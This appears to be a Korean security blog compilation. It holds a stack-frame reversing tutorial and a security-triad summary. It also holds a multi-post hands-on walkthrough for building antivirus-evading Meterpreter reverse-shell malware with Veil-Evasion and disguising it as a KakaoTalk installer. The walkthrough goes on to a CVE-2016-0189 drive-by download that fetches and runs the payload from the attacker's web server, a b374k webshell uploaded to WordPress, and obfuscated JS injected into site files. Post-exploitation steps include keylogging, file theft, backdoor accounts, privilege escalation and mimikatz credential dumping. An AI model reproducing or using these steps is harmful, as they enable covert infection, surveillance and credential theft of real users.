안녕들 하시죠!

오늘은 스택 프레임에 대해 알아보겠습니다.

스택 프레임은 프로그램에서 선언되는 로컬 변수와 함수 호출에 사용됩니다.

이번 실습을 진행하기 위해서는 지난시간에 공부했던 'IA-32 Register' 의 ESP, EBP 개념이 필요합니다.

ESP는 스택포인터로서 프로그램 안에서 ESP 레지스터는 수시로 변경되기 때문에 스택에 저장된 변수, 파라미터에 접근하고자 할 때 ESP 값을 기준으로 하면 프로그램을 만들기 힘들고, CPU가 정확한 위치를 참고할 때 어려움이 있습니다.

따라서, 어떤 기준 시점( 함수 시작 )의 ESP값을 -> EBP에 저장하고 이를 함수내에서 유지해줍니다.

그러면 ESP값이 아무리 변하더라고 EBP를 기준으로 안전하게 해당 함수의 변수, 파라미터, 복귀 주소에 접근이 가능합니다.

이것이 EBP 레지스터의 베이스 포인터 역할입니다.

PUSH EBP  

함수 시작 ( EBP를 사용하기 전에 기존의 값을 스택에 저장한다 )

MOV EBP, ESP

현재의 ESP( 스택포인터 ) 를 EBP에 저장.

///

함수 본체 

여기서 ESP가 변경되더라도 EBP에 저장되어 있으므로 안전하게 로컬 변수와 파라미터를 엑세스 할 수 있다.

///

MOV ESP, EBP

ESP를 정리 ( 함수 시작했을 때의 값으로 복원시킴 )

POP EBP

리턴되기 전에 저장해 놓았던 원래 EBP 값으로 복원.

RETN

함수종료

이런 식으로 스택 프레임을 이용해 함수 호출을 관리하면 스택을 완벽하게 관리할 수 있습니다.

이제, 아주 간단한 프로그램을 통해 스택 프레임을 이해해보겠습니다.

위에있는 코드를 StackFrame.exe로 빌드한 후 Ollydbg를 이용해 열어보겠습니다.

아래에 파일도 같이 첨부하겠습니다.

StackFrame.exe

Go to 명령어로 401000 주소로 이동하겠습니다.

위에 올렸던 코드를 부분부분 찾아 이해해보겠습니다. 

1. StackFrame.exe

1.1. Main() 함수 

우선, Main() 함수 부분 ( 201020 ) 주소 에 BP를 설치[F2] 한 후 [F9]로 실행하겠습니다.

ESP 19FF3C, EBP 19FF80 이고 아래 ④번을 보시면 ESP가 가리키고 있는 19FF3C에 저장된 값 401250은 Main() 함수의 실행이 끝난 후,

돌아갈 리턴 주소입니다.

00401020        PUSH EBP

위의 명령은 'EBP값을 스택에 집어넣어라' 라는 뜻입니다. 

Main() 함수에서 EBP가 베이스 포인터의 역할을 하게 될테니 EBP가 이전에 가지고 있던 값을 스택에 백업해두기 위함입니다.

00401021        MOV EBP, ESP

위의 명령은 'ESP값을 EBP로 옮겨라' 라는 뜻입니다.

이젠 ESP와 EBP 둘다 19F88값을 가지게 되었구요, 19FF80 주소에는 19FF80이라는 값이 저장되어 있습니다.

19FF80은 Main() 함수가 시작할 때 EBP가 가지고 있던 초기 값입니다.

1.2. 지역 변수

로컬 변수 ( a, b )를 위한 공간을 만들고 값을 입력한다.

위의 명령은 'ESP 값에서 8을 빼라' 라는 뜻입니다.

위의 자료형 크기표를 보시면 long 은 4byte로 되어있습니다.

a 와 b 는 long 타입으로 선언되었습니다.

long 타입이 2개이니 8byte를 SUB로 빼주면 a와 b 두 변수가 스택에 저장될 공간이 생기게 됩니다.

위의 명령은 '[EBP-4] 에는 1을 넣고, [EBP-8] 에는 2를 넣어라' 입니다.

다음 게시물에 이어서...

참고서적 이승원 「리버싱 핵심원리」 인사이트(2018) p75~82

안녕들 하시죠 !

이번시간에는 CVE-2016-0189 취약점을 이용한 사이트 방문만으로 악성코드가 다운되는 실습을 진행해보겠습니다.

얼마전 올린 글에서 사용한 기법들을 사용할텐데요.

Veil-Evasion, vbscript_gotmode.html, b374k 웹쉘 등 을 이용할 계획입니다.

우선 Veil-Evasion을 이용하여 백신에 탐지되지 않는 악성코드를 만들어보겠습니다.

지난 게시물에서 진행했던 부분이니 빠르게 넘어가겠습니다.

list

use 27

set LHOST [ 본인 kali ip ]

set LPORT [ 임의의 포트 ]

generate

악성코드 명 : messbox.exe

pyinstaller 1번을 선택하겠습니다.

messbox.exe을 /var/www  apache의 경로로 복사해놓겠습니다.

cp /usr/share/veil-output/compiled/messbox.exe /var/www

msfconsole을 핸들러 경로로 실행시키겠습니다.

msfconsole -r /usr/share/veil-output/handlers/messbox_handler.rc

이 핸들러는 실습이 끝날때 까지 유지해야합니다 !

자, 이제 /var/www 경로에 있는 vbscript_godmode.html을 우클릭 하여 leafpad로 열겠습니다.

find 기능을 이용해 cmd 위치를 찾아주세요.

위에 화살표가 가리키고 있는 부분을 지우고 제 kali ip로 바꾸겠습니다.

http://192.168.0.29/messbox.exe

위에있는 쉘코드는 %TEMP% 폴더에 .vbs 파일을 작성하고 실행하도록 구성했고, 이 .vbs가 실행되면 웹 서버에서 악성코드 ( messbox.exe ) 

를 호출하여 다운로드하고, 실행하도록 구성되어 있습니다.

%TEMP% 폴더를 사용하는 이유는 UAC를 우회하기 위함입니다.

혹시 악성코드 명을 messbox가 아닌 다른걸로 하신분들은 이부분에서 본인 악성코드 명을 적어주세요.

그럼 아래있는 부분도 알아서 바뀝니다.

http://[ 본인 Kali ip ]/[ 본인 악성코드 명.exe ]

이제 wordpress에 관리자 권한으로 들어가 slideshow-gallery.1.4.6 plugin을 이용해 웹쉘을 업로드 해 보겠습니다.

slideshow-gallery.1.4.6 버전은 파일업로드 취약점을 가지고 있는데요.

필요하신 분들은 아래 파일을 받아서 사용하세요.

Slideshow -> Add New

찾아보기를 눌러 b374k 웹쉘을 업로드한 후 아래의 save slide를 누르겠습니다.

필터링을 하고 있지 않기에 이렇게 쉽게 업로드하였습니다.

아래 주황색으로 하이라이트 되어있는 부분을 보면 127.0.0.1/wordpress/wp-content/uploads/slideshow-gallery/8.php로 되어있는데요

업로드한 파일의 경로와 저장된 이름명이 임의의 8.php로 바뀌어있는 것을 알 수 있습니다.

Image 우클릭 -> 새 창에서 링크 열기 를 누르겠습니다.

웹쉘이 실행 되었습니다.

윗부분 입력란에 비밀번호 b374k를 입력하고 Go !를 누르시면 접속됩니다.

/var/www/html/wordpress/wp-includes/js/jquery/jquery-migrate.min.js 경로로 이동하겠습니다.

아래의 js를 난독화하여 추가해보겠습니다.

Paste: 부분에 js를 복사 붙여넣기 하고 Base62 encode를 체크 후 Pack을 눌러 난독화를 시켰습니다.

Copy: 부분에 난독화되어진 코드를 복사하여 웹쉘로 돌아가겠습니다.

Actions의 edit을 눌러 편집해보겠습니다.

스크롤을 맨 아래로 내려 맨뒤에 난독화 코드를 붙여넣고 save ! 를 눌러 저장 후 빠져나오겠습니다.

kali로 돌아가 아까 작업했던 vbscript_godmode.html 을 0189.html로 이름만 수정해줍니다.

이제 피해자 PC에서 Ubuntu ( Wordpress ) 의 ip를 입력해 접속해보겠습니다.

TEMP 폴더는 파일탐색기의 경로창에 %TEMP%라고만 치시면 바로 나옵니다.

피해자 PC로 웹페이지를 들어가기만 했는데도 악성코드가 다운로드가 되었습니다.

중간에 오류가생겨 다른 vm으로 진행하느냐고 ip가 조금 다를 수 있습니다.

세션을 연결하여 migrate 까지 진행해봤습니다.

이러한 침투를 방지하려면 취약점이 있는 IE버전을 사용하지말고 항상 최신버전으로 업데이트 해주는게 제일 중요한 것 같습니다.

이번 실습은 내용도 많고 시간도 많이 걸린만큼 배운게 많았던 것 같습니다.

오늘은 여기까지입니다 감사합니다 !

안녕들 하시죠 !

오늘은 인터넷 익스플로러의 취약점 CVE-2016-0189 를 이용하여 Drive by download 실습을 진행해보겠습니다.

이번 실습은 IGLOO SECURITY BLOG 의 ' 스크립팅 엔진 메모리 손상 취약점 ( CVE-2016-0189 ) 분석 ' 글을 참고하며 진행했습니다.

Drive by download 란?

이미 알려진 보안 취약점을 이용하여 불특정 다수에게 악성코드를 유포하는것.

보안이 취약한 홈페이지를 변조하여 이미 알려진 보안 취약점을 공격하는 악성코드를 심어놓는다.

사용자는 어떠한 다운로드나 첨부파일을 열어본적 없지만 감염되게된다.

이를 방지하기위하여 사용하는 프로그램을 최신버전으로 유지하는 것이 중요하다.

출처 EST Security 「 Drive by download란 무엇일까요 ? 」   

아래는 취약점 정보와 공격 시나리오 입니다.

출처 IGLOO SECURITY BLOG  「 스크립팅 엔진 메모리 손상 취약점 ( CVE-2016-0189 ) 분석 」

위의 정보를 확인하고싶은 분들은 아래의 URL로 들어가보시면 될 것 같습니다.

http://www.igloosec.co.kr/BLOG_%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8C%85%20%EC%97%94%EC%A7%84%20%EB%A9%94%EB%AA%A8%EB%A6%AC%20%EC%86%90%EC%83%81%20%EC%B7%A8%EC%95%BD%EC%A0%90(CVE-2016-0189)%20%EB%B6%84%EC%84%9D?bbsCateId=1

우선 Github에서 익스플로잇 코드를 다운받고 IE 브라우저가 CVE코드의 영향을 받는지 확인해보겠습니다.

공격자PC : Kali linux

피해자PC : Window 7

https://github.com/theori-io/cve-2016-0189 // Github 페이지 입니다.

git clone https://github.com/theori-io/cve-2016-0189 // Kali 터미널에 입력해 익스플로잇 코드를 다운받겠습니다.

git clone으로 다운받은 후에 exploit 폴더로 이동합니다.

vbscript_godmode.html 을 apache2 가 있는 /var/www 폴더로 이동시켜줍니다.

leafpad로 연 후에 search -> find기능을 이용하여 cmd를 찾아보겠습니다.

위의 이미지를 보시면 vbscript_godmode.html에는 cmd를 실행시키는 익스플로잇 코드가 존재합니다.

이제 피해자 PC로 이동하여 [Kali ip]/vbscript_godmode.html 을 입력해 줍니다.

실행이 잘 되었네요.

다음시간에는 이를 이용하여 피해자가 wordpress 사이트를 방문만 해도 악성코드가 받아지도록 하는 실습을 진행해보겠습니다.

오늘은 여기까지입니다 감사합니다 ! 

안녕들 하시죠 !

이번시간에는 악성코드를 이용하여 피해자PC를 장악해보겠습니다.

준비가 안되신 분들은 아래의 URL을 보고 따라해보시면 좋겠습니다.

https://hongpossible.tistory.com/36?category=770424 // 1. Veil-evasion을 이용한 백신에 탐지되지 않는 악성코드 만들기

https://hongpossible.tistory.com/37?category=770424 // 2. 악성코드와 정상적인 설치파일 합치기

https://hongpossible.tistory.com/38?category=770424 // 3. 악성코드 프로세스 목록에서 숨기기

우선, 지난시간에 프로세스목록에서 숨겼으니 잘 침투해 있는지 키스캔을 통해 확인해보겠습니다.

keyscan_start

확인을 위해 구글을 켜보고 원격 연결에 들어가보겠습니다.

덤프를 떠보니 잘 침투해 있는걸 확인할 수 있었습니다.

이번에는 피해자PC에 아무 엑셀파일이나 넣어놓고 진행했습니다.

download 명령어로 엑셀파일을 공격자PC로 받아보고, 악성코드를 보내기도 해보겠습니다.

우선 엑셀파일을 검색해보겠습니다.

search -f *.xlsx

C:\경로에 OS.xlsx라는 20136byte의 엑셀파일이 존재하네요. 

업, 다운로드를 명령어를 통해 실행했습니다.

이제 윈도우 shell로 들어가 백도어 계정을 만들고, 권한상승, 피해자PC 계정의 패스워드를 알아내보겠습니다.

shell -> net user /add 명령어로 백도어 계정을 만듭니다.

* 위 이미지처럼 ???? 형식으로 글자가 깨져서 나온다면 따라해보세요

Terminal -> Set Character Encoding -> Add or Remove

Available encodings: 에 있는 Korean EUC-KR 을 -> 화살표를 눌러 오른쪽 으로 추가시켜줍니다.

그다음 다시 Terminal -> Set Character Encoding -> Korean을 선택해줍니다.

성공

현재 getuid명령어로 확인해보면 Administrator의 권한입니다.

목표는 System 권한이기때문에 svchost.exe 로 migrate해야합니다.

ps -S svchost.exe

목록을 보면 SYSTEM권한으로 된 것이 3개가 있습니다. 

이중 912번을 선택해 migrate 하겠습니다.

getuid로 알아보면 SYSTEM으로 권한 상승이 되어있네요.

이제, 윈도우 계정정보를 알아내기위한 mimikatz를 사용하겠습니다.

load mimikatz

?를 입력해 명령어들을 알아보았습니다.

스크롤을 내리보면 여러 명령어 들이 있는데요.

저는 kerberos 기능을 사용하겠습니다.

생각보다 굉장히 간단하네요.

제가 실제로 사용하는 비밀번호라 조금 가렸습니다.

run vnc 명령어를 통해 피해자의 행위를 감시할 수도 있고, screenshot 명령어를 통해 피해자의 화면을 캡처할 수 있습니다.

오늘은 여기까지입니다 감사합니다 !

안녕들 하시죠 !

저번시간에는 악성코드를 만든 후 카카오톡 설치파일과 합치고, 핸들러를 켜 놨었습니다.

이제 피해자PC에서 악성코드를 실행시키고 들키지않게 프로세스 목록에서 숨겨보겠습니다.

준비가 안되신 분들은 아래의 URL을 따라해보시면 좋겠습니다.

https://hongpossible.tistory.com/36?category=770424 // 1. Veil-evasion을 이용한 백신에 탐지되지 않는 악성코드 만들기

https://hongpossible.tistory.com/37?category=770424 // 2. 악성코드와 정상적인 설치파일 합치기

피해자 PC로 카카오톡 설치파일을 이동 후, 실행시키게되면 공격자PC에서는 세션이 오픈됩니다.

sessions 명령어를 통해 세션을 확인한 후,

sessions -i 1 로 1번세션과 연결을 합니다.

sysinfo로 피해자PC의 사양 확인, pwd로 현재 경로를 확인합니다.

피해자PC에서 작업관리자에 들어가보면 저렇게 대놓고 hongpossible.exe 가 실행되고 있음을 알 수 있습니다.

알아차리지 못하도록 migrate명령어를 이용해 다른 프로세스로 이주( 도망 )해 보겠습니다.

우선 ? 를 입력해 명령어 목록을 보겠습니다.

밑으로 쭉 내려보시면 migrate = Migrate the server to another porcess 라고 되어있는 것 보니 맞습니다.

운영체제가 돌아가는 동안 필수적인 프로세스라 하면 explorer.exe가 있는데요.

ps -S explorer.exe

explorer.exe의 PID가 1996이라고 나옵니다.

이제 migrate 1996 명령어를 통해 몸을 숨기겠습니다.

감쪽같이 사라졌습니다.

오늘은 여기까지입니다 감사합니다 !

안녕들 하시죠 !

이번시간에는 앞서 만든 악성파일을 가지고 카카오톡 설치파일과 합쳐보겠습니다.

악성코드가 없으신 분들은 아래의 URL을 보고 따라해보시면 될 것 같습니다.

https://hongpossible.tistory.com/36?category=770424 // Veil-evasion을 이용한 백신에 탐지되지 않는 악성코드 만들기

자, 우선 Window7에 악성파일 hongpossible.exe 와 가장최신버전 카카오톡 설치파일을 옮겨보겠습니다.

이제 저는 파일 합치는프로그램으로 PowerMerger 와 아이콘 변환 프로그램 reshack을 사용하겠습니다.

프로그램이 없으신 분들께서는 아래에서 다운받아주세요.

PowerMerger_파일합치기.zip

reshack3.6.0.92.zip

압축을 풀고 PowerMerger 폴더로 들어가 실행시키겠습니다.

화살표가 가리키고있는 icon의 '...'을 눌러보시면 프로그램을 합친 후에 보여질 아이콘을 선택할 수 있습니다.

우선 합친 후 다시 카카오톡 아이콘으로 바꿀 것 이기때문에 아무거나 마음에 드는걸로 눌러주겠습니다.

PowerMerger는 1st에 있는 프로그램을 먼저 실행 시키고 바로 이어서 2nd에 있는 프로그램을 실행시킵니다.

목적은 정상적으로 카카오톡 설치파일이 실행되는 것 처럼 보여야 하기때문에 1st 의 '...' 버튼을 누르고 카카오톡 설치파일을 선택해줍니다.

2nd에는 hongpossible.exe 악성코드를 선택하겠습니다.

자, 누가봐도 카카오톡 설치파일이 아닌 것 같은 파일이 하나 만들어졌습니다.

이제 reshack 프로그램을 이용하여 카카오톡 설치파일 아이콘으로 바꿔주겠습니다.

reshack 프로그램을 실행 시켜주신 후에, 아까 PowerMerger로 합친 파일을 끌어서 흰 부분에 넣어줍니다.

그러면 icon 과 icon Group이 나오게 됩니다.

icon -> 1 -> 1040 마우스 우측 버튼을 누른 후에 자원 교체를 누르겠습니다.

새 아이콘 파일 열기 -> 카카오톡 설치파일 선택 -> 열기 -> 교체 순으로 진행하겠습니다.

파일 -> 저장을 선택하겠습니다.

그리고 나서 Merged 폴더에서 F5번을 눌러 새로고침을 누르겠습니다.

자, 원하는 대로 카카오톡 실행파일 아이콘으로 변경이 되었습니다.

이제 KaKaoTalk_Setup.hongpossible.exe 라는 파일명에서 이름바꾸기를 통해 hongpossible를 지우겠습니다.

이제 누가봐도 카카오톡 설치파일처럼 보이네요 !

다음시간에는 제작한 카카오톡 악성코드를 가지고 피해자PC에서의 권한상승, 키스캔 등 여러가지 방법으로 실습 해보겠습니다.

오늘은 여기까지입니다 감사합니다 !

안녕들 하시죠 !

이번시간에는 Veil-evasion을 이용하여 백신에 탐지되지 않는 악성코드를 만들어보겠습니다.

1. Veil-evasion을 이용해 악성코드 제작.

2. Virustotal로 악성코드 검사.

3. 카카오톡 설치파일과 악성코드를 합치고 아이콘수정.

4. 피해자PC에서 악성코드 실행 후, migrate명령어로 프로세스 숨기기.

5.  keyscan, 엑셀 파일 업,다운로드, screenshot, run vnc로 피해자PC 감시.

6. 권한상승, 윈도우 SAM파일에 저장되어있는 패스워드 dump뜨기.

이러한 순서로 진행해보겠습니다.

Veil-Evasion.py를 클릭해 실행시키겠습니다.

41개의 payload를 가지고있는 Veil-evasion이 실행됬네요.

list를 입력해 페이로드를 보겠습니다.

meterpreter는 os에 상관없이 장악한 피씨가 어떤 종류건 간에 공격자가 자주 사용하는 시스템 명령어를 예약시켜놓고있습니다.

그래서 윈도우 명령어를 몰라도 되는 장점이 있습니다.

python/meterpreter/rev_tcp 라고 되어있는 27번을 사용하겠습니다.

c/meterpreter/rev_tcp를 선택해도 되겠지만, C를 사용하면 백신에 걸려버리기때문에 python을 이용해 만들겠습니다.

use 27을 입력하겠습니다.

자, 이제 set LHOST [ 본인 kali ip ], set LPORT [ 임의의 포트 ] 를 입력하고 확인을 위해 info 들어가겠습니다.

잘 입력이 되었네요.

이제 generate를 입력하겠습니다.

위에 hongpossible은 악성코드명,

1 - Pyinstaller ( default ) 는 피해자PC에 파이썬을 깔고 악성코드를 실행시켜주겠다. 라는건데 이것때문에 잡히기도 한답니다.

* 도중에 오류로 vm을 바꿔 진행하여 ip주소가 다르게 나옵니다.

주황색 부분의 악성코드경로를 복사합니다.

Ctrl + Shift + T를 눌러 새 터미널을 띄우고,

cp /usr/share/veil-output/compiled/hongpossible.exe /root/Desktop/ 을 입력해 바탕화면 경로로 악성코드 복사.

안녕들 하시죠 !

이번시간에는 보안의 3요소( 기밀성, 무결성, 가용성 )에 대해 알아보겠습니다.

ㆍ 기밀성 ( Confidentiality )

- 정보를 오직 인가된 사용자에게만 허가.

- 개인정보나 지적 재산권 등 가치 있는 정보.

- 기업보유 핵심기술 / 민원인들에 대한 개인정보.

- 비밀스럽게 유지되고있으며 특정 인물만 볼 수 있는 기밀정보를 생각하시면 편할 것 같습니다.

ㆍ 무결성 ( Integrity )

- 부적절한 정보 변경이나 파기 없이 정확하고 완전하게 보존.

ㆍ 가용성 ( Availability )

- 시기적절하면서 신뢰할 수 있는 정보로 접근과 사용.

- 구매한 아이폰을 1년 365일 그 언제라도 수리받고 사용할 수 있다면 가용성이 좋은거겠죠.

이번에는 보안의 3요소의 훼손에 대해 알아보겠습니다.

ㆍ 기밀성 훼손

- 업데이트 서버 해킹 : 정상적인 관리자가 아닌 외부 해커에 의해 서버 접근.

- 관리자 PC 해킹 : 데이터베이스 접근 ID와 암호 노출.

- 내부의 자산을 파악하기 위해 훔쳐보는 스캐닝 같은 행위.

- 네트워크 통신 경로의 중간에 개입하여 도청하는 행위.

ㆍ 무결성 훼손

- 정상적인 업데이트 파일이 아닌 악성코드가 포함된 파일로 교체된 것은 무결성 위배.

- 악성코드에 의해 시스템을 장악당하고 임의로 파일들을 바꿔버린다면 무결성이 깨진거겠죠.

ㆍ 가용성 훼손

- 개인정보 유출 사고만 해당하기 때문에 가용성의 위배는 발생하지 않음.

- 가용성 훼손의 대표적 공격은 서비스 거부 ( Dos ) & 분산 서비스 거부 ( DDos ) 이다. 

  과부하로인해 시스템을 사용 불가능하게 만든다.

보안의 3요소는 주요 분야에 따라 우선순위가 변화할 수 있습니다.

예를 들어, 금융회사의 경우 금전 데이터의 무결성 훼손을 최대 우선으로 적용. 

거래 금액의 손실은 절대 불가 하기때문입니다.

오늘은 여기까지입니다 감사합니다 !

참고서적 「K Shield Jr. 정보보안 기초」